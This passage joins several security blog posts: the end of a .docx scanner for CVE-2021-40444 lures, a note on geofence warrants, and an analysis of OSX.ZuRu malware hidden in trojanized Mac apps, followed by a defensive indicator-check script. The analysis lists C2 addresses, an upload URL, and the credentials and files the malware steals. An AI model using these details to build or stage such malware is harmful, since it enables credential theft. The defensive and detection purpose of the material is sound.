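def build_sample_docx(rels_xml):
    """Assemble a constructed .docx (a zip package) around the given rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES)
        zf.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


def scan_path(path):
    with open(path, "rb") as fh:
        return find_external_ole_relationships(fh.read())


if __name__ == "__main__":
    if len(sys.argv) == 1:
        for label, rels in (("benign", BENIGN_RELS), ("suspicious", SUSPICIOUS_RELS)):
            print(label, find_external_ole_relationships(build_sample_docx(rels)))
    for path in sys.argv[1:]:
        for part, target, severity in scan_path(path):
            print(f"{severity.upper()}: {path} {part} -> {target}")
```

Run it with one or more `.docx` paths to scan real files, or with no arguments to see the result on the two constructed samples. The check looks only at relationship metadata, so it is cheap enough to run over a mail quarantine or a file share, and it does not depend on the remote content being reachable.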

The second attachment we found claims to originate from the Ministry of the Interior in Moscow. This type of attachment can be used against a wide range of targets.

A phishing email posing as the Russian Ministry of the Interior

The title of the document translates to “Notification of illegal activity.” It asks the receiver to please fill out the form and return it to the Ministry of Internal Affairs, or reply to the email. It also urges the intended victim to do so within 7 days.

Russian targets

It is rare that we find evidence of cybercrimes against Russian targets. Given the targets, especially the first one, we suspect that there may be a state-sponsored actor behind these attacks, and we are trying to find out the origin of the attacks. We will keep you informed if we make any progress in that regard.

Patched vulnerability

The CVE-2021-40444 vulnerability may be old-school in nature (it involves ActiveX, remember that?) but it was only recently discovered. It wasn’t long before threat actors were sharing PoCs, tutorials and exploits on hacking forums, so that everyone was able to follow step-by-step instructions in order to launch their own attacks.

Microsoft quickly published mitigation instructions that disabled the installation of new ActiveX controls, and managed to squeeze a patch into its recent Patch Tuesday output, just a few weeks after the bug became public knowledge. However, the time it takes to create a patch is often dwarfed by the time it takes people to apply it. Organizations, especially large ones, are often found trailing far behind with applying patches, so we expect to see more attacks like this.

Stay safe, everyone!

The post MSHTML attack targets Russian state rocket centre and interior ministry appeared first on Malwarebytes Labs.

Google, geofence warrants, and you

Another day, another example of how the data sharing choices we make can come back to haunt us. The Guardian reports on a Florida resident who found his bike ride data requested by law enforcement, because his route had taken him close to the scene of a burglary a year earlier.

According to the report, he had just seven days to put something in front of a judge to block the data’s release. Not everyone would know how to do this, much less have heard of geofencing before.

What happened here?

Geofencing 101

Geofencing wraps virtual “fences” around real locations. It’s commonly talked about in relation to advertising and marketing activities, and it helps you track movement by pinging away should you enter or leave a specified location. It can be helpful or adversarial, depending on your need, and your point of view. It can be used for things as varied as keeping your advertising spend focussed on people from a particular area, or checking that serious offenders under some form of house arrest don’t stray outside the areas they’re allowed to visit.

What is a geofence warrant?

A geofence warrant, also known as a “reverse location warrant”, involves grabbing data on everybody close to a crime scene. Were you involved? Or simply passing by? Doesn’t matter! Into the pile of law enforcement data you go. You just have to hope you’re not caught up in some sort of mistaken identity fiasco down the line.

These warrants are increasingly being used for all sorts of reasons. The fear is they’ll contribute to a chilling effect on free speech, protest, and more. Indeed, Google has recently said these warrants “make up one quarter of all US demands” for its data. It’s easy to see why this would be the case. It’s lots of incredibly precise movement data, tied to big slices of people’s personal identity and physical objects kept about their person.

Which keywords open the door?

It’s not just geofencing causing headaches for privacy advocates. Requests for keyword searches are very popular too. This is where your search history is grabbed and examined for signs of…well…who knows. Essentially, you’re at the mercy of completely random investigations aligning with your completely random searches.

While Google states these data requests “…represent less than 1% of total warrants and a small fraction of the overall legal demands for user data that we currently receive”, it’s still rather uncomfortable to think about.

Is there any refuge in anonymity?

Well, that’s a very good question. There are plenty of examples where theoretically anonymous data turned out not to be, after ending up online. Time and again we’ve seen that, with surprisingly few data points, users can be identified from anonymised data.

Geofence warrants leapfrog several of those issues and go directly for the user ID. If you make use of any form of location data whatsoever, it can be used against you. Even if you disable your Bluetooth, refuse beacon access, turn off all GPS features, and choose not to store your exercise routes in your latest exercise app, simply carrying the phone around and using it as intended is potentially more than enough.

There is no simple solution to this one; primarily it’s down to Google to run a tight ship. It’s also incumbent on privacy orgs and people working at various levels of Government to ensure no overreach is taking place.

What can I do to reduce any privacy risk?

You can consider using services other than Google. If you don’t want your entire online existence in one big pot of data, feel free to mix and match a little. Try out DuckDuckGo for your searching perhaps, or fire up a VPN. Just be aware that other organisations may not have the same outlook on these requests as Google does. It might be the case that they don’t have the same legal might Google carries. They may have no policy on this kind of request at all, and hand everything they have on you to whoever asks for it. This would probably not be ideal in the privacy stakes.

The choice, as they say, is yours.

The post Google, geofence warrants, and you appeared first on Malwarebytes Labs.

New Mac malware masquerades as iTerm2, Remote Desktop and other apps

Last week, security researcher Patrick Wardle released details of a new piece of malware masquerading as the legitimate app iTerm2. The malware was discovered earlier the same day by security researcher Zhi (@CodeColorist on Twitter), and detailed on a Chinese-language blog. (For those who don’t speak Chinese, Safari seems to do a fair job of translating it.)

iTerm2 is a legitimate replacement for the macOS Terminal app, offering some powerful features that Terminal does not. It is frequently used by power users. It is a favorite of security researchers because of the propensity for Mac malware to take control of, or detect usage of, the Terminal app, which can interfere with attempts to reverse engineer malware. This makes iTerm2 an ideal app to trojanize in order to infect people who may have access to development systems, research intelligence, etc.

iTerm2 is a popular replacement for the macOS Terminal app

The website for the legitimate iTerm2 app is iTerm2.com. However, the malicious version of iTerm2 was apparently being distributed via iTerm2[.]net, which was a very convincing duplicate of the legitimate iTerm2 site.

Clicking the download link on the lookalike site would result in an iTerm2.dmg disk image file being downloaded from kaidingle[.]com.

The malware comes in a disk image that contains a link to the Applications folder with a Chinese name

The disk image throws the first red flag. The real iTerm2 is distributed in a zip file, rather than a disk image. Further, for an app with a very professionally designed website, the disk image file is quite unpolished. It also includes a link to the Applications folder with a Chinese name, which is unusual for an app that is English-only and does not contain any Chinese localization files.

Malware behavior

The malicious iTerm2 app appears to be a legitimate copy of the iTerm2 app, but with one file added:

iTerm.app/Contents/Frameworks/libcrypto.2.dylib

When launched, the malicious app loads and runs the malicious libcrypto.2.dylib dynamic library, which in turn does a couple of things.

The main purpose seems to be to connect to 47.75.123[.]111, from which it downloads a Python file named g.py and a Mach-O binary named GoogleUpdate into the /tmp folder, then executes both of them.

The GoogleUpdate binary is heavily obfuscated, and it’s currently not known exactly what it does. However, according to Patrick, it communicates with what appears to be a Cobalt Strike server (47.75.96[.]198:443), which may mean it is a Cobalt Strike “beacon,” which would provide comprehensive backdoor access to the attacker.

The g.py file is clear-text Python code, and thus its intent is quite clear. It collects the following data:

  • Machine serial number.
  • Contents of the user’s home, desktop, Documents, and Downloads folders.
  • Applications folder contents.
  • Command histories for bash and zsh, which can contain sensitive information such as credentials.
  • The git config file, which contains potentially sensitive information, including an e-mail password.
  • The /etc/hosts file, which can contain details on custom servers accessed by the user.
  • The .ssh folder, which can contain credentials for SSH.
  • The user’s keychains, which contain many credentials and can be unlocked if the user’s password can be obtained.
  • The config file for SecureCRT, a terminal emulator program.
  • The saved application state for iTerm2.

These files are all copied into ~/Library/Logs/tmp/, compressed into a file at ~/Library/Logs/tmp.zip, which is then uploaded to http://47.75.123[.]111/u.php?id=%s (where the %s is replaced with the machine’s serial number).

Thus, the primary goal of the g.py script seems to be to harvest credentials and other data that would be of use for lateral movement within an organization. Presumably, the backdoor provided by the GoogleUpdate process would be used to perform that lateral movement and infect other machines.

Additional trojanized apps

Subsequent findings revealed additional apps that had also been trojanized, using the same libcrypto.2.dylib file. These apps were:

  • Microsoft Remote Desktop
  • SecureCRT
  • Navicat Premium (a database management app)

Who is affected?

At the moment, few people with Malwarebytes installed seem to be affected. We’ve only seen a detection on one computer so far, in Asia.

There are indications that this malware may be primarily distributed in China and other southeast Asian countries, where Malwarebytes has a relatively small install base. For readers outside that region, you probably don’t have much to fear.

However, out of an abundance of caution, if you have one of these apps, it would not be a bad idea to replace it with a known legitimate copy, being sure to get it from the official website of the developer rather than from a lookalike site or a download mirror.

You should also run a scan with Malwarebytes, which will detect this malware as OSX.ZuRu.

Samples

iTerm2.dmg                   e5126f74d430ff075d6f7edcae0c95b81a5e389bf47e4c742618a042f378a3fa
com.microsoft.rdc.macos.dmg  5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259
Navicat15_cn.dmg             6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff
SecureCRT.dmg                1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921
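As an added example (not Malwarebytes code, and not a replacement for a scan), the following Python script turns the indicators described in this article into a host check: the injected `Contents/Frameworks/libcrypto.2.dylib` inside any `.app` bundle, the `~/Library/Logs/tmp/` and `~/Library/Logs/tmp.zip` staging paths used by g.py before upload, and the four SHA-256 hashes from the sample list above, matched against `.dmg` files in Downloads. The self-test builds a constructed fake home directory in a temporary folder; the directories it scans by default (`/Applications`, `~/Applications`, `~/Downloads`) are assumptions about where such files usually land.

```python
"""Host check for the OSX.ZuRu indicators described in the article.

Added example, not Malwarebytes code. The fixture built by
build_constructed_fixture() is constructed for the self-test only."""
import hashlib
import tempfile
from pathlib import Path

# SHA-256 hashes of the trojanized disk images, copied from the article's sample list.
KNOWN_BAD_DMG_SHA256 = {
    "e5126f74d430ff075d6f7edcae0c95b81a5e389bf47e4c742618a042f378a3fa": "iTerm2.dmg",
    "5ca2fb207762e886dd3336cf1cb92c28f096a5fbb1798ea6721b7c94c1395259": "com.microsoft.rdc.macos.dmg",
    "6df91af12c87874780cc9d49e700161e1ead71ae045954adbe7633ec9e5e45ff": "Navicat15_cn.dmg",
    "1e462f8716275dbae6acb3ff4f7a95624c1afb23c5069fa42a14ed49c2588921": "SecureCRT.dmg",
}
# The one file the trojanized apps add to an otherwise legitimate bundle.
INJECTED_DYLIB = Path("Contents/Frameworks/libcrypto.2.dylib")
# Where g.py stages the collected files before uploading them.
STAGING_ARTIFACTS = ("Library/Logs/tmp", "Library/Logs/tmp.zip")


def sha256_file(path, chunk_size=1 << 20):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_injected_dylibs(app_dirs):
    """Return every .app bundle directly under app_dirs that carries the injected dylib."""
    hits = []
    for app_dir in app_dirs:
        app_dir = Path(app_dir)
        if app_dir.is_dir():
            hits.extend(str(b) for b in app_dir.glob("*.app") if (b / INJECTED_DYLIB).is_file())
    return sorted(hits)


def match_known_bad_dmgs(dmg_paths, known=KNOWN_BAD_DMG_SHA256):
    """Return (path, sample name) for each file whose SHA-256 is in the IoC list."""
    matches = []
    for path in dmg_paths:
        digest = sha256_file(path)
        if digest in known:
            matches.append((str(path), known[digest]))
    return matches


def find_staging_artifacts(home):
    """Return the g.py staging paths that currently exist under home."""
    home = Path(home)
    return [str(home / rel) for rel in STAGING_ARTIFACTS if (home / rel).exists()]


def run_host_check(home=Path.home(), app_dirs=("/Applications", str(Path.home() / "Applications"))):
    downloads = Path(home) / "Downloads"  # assumed location of downloaded disk images
    dmgs = list(downloads.glob("*.dmg")) if downloads.is_dir() else []
    return {
        "injected_dylibs": find_injected_dylibs(app_dirs),
        "known_bad_dmgs": match_known_bad_dmgs(dmgs),
        "staging_artifacts": find_staging_artifacts(home),
    }


def build_constructed_fixture(root):
    """Constructed fake home: one trojanized-looking bundle, one clean one, a staging zip, an empty dmg."""
    root = Path(root)
    bad = root / "Applications" / "iTerm.app" / INJECTED_DYLIB
    bad.parent.mkdir(parents=True)
    bad.write_bytes(b"constructed placeholder, not a real dylib")
    (root / "Applications" / "Clean.app" / "Contents" / "MacOS").mkdir(parents=True)
    (root / "Library" / "Logs").mkdir(parents=True)
    (root / "Library" / "Logs" / "tmp.zip").write_bytes(b"")
    (root / "Downloads").mkdir()
    (root / "Downloads" / "empty.dmg").write_bytes(b"")
    return root


def self_test():
    """Run every check against the constructed fixture and return the raw results."""
    with tempfile.TemporaryDirectory() as tmp:
        home = build_constructed_fixture(tmp)
        dmg = home / "Downloads" / "empty.dmg"
        result = run_host_check(home, [home / "Applications"])
        result["empty_dmg_sha256"] = sha256_file(dmg)
        # The constructed dmg cannot match the real IoCs; a custom list shows the matching path works.
        result["constructed_match"] = match_known_bad_dmgs([dmg], {sha256_file(dmg): "constructed.dmg"})
        return result


if __name__ == "__main__":
    for key, value in run_host_check().items():
        print(f"{key}: {value or 'none found'}")
```

Run with no arguments on a Mac to check the live system; `self_test()` exercises the same functions against the constructed fixture. A hit on the dylib or the staging paths is the stronger signal, since a re-downloaded disk image with a different hash would not appear in the list, while the injected file name is what all four trojanized apps share.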

The post New Mac malware masquerades as iTerm2, Remote Desktop and other apps appeared first on Malwarebytes Labs.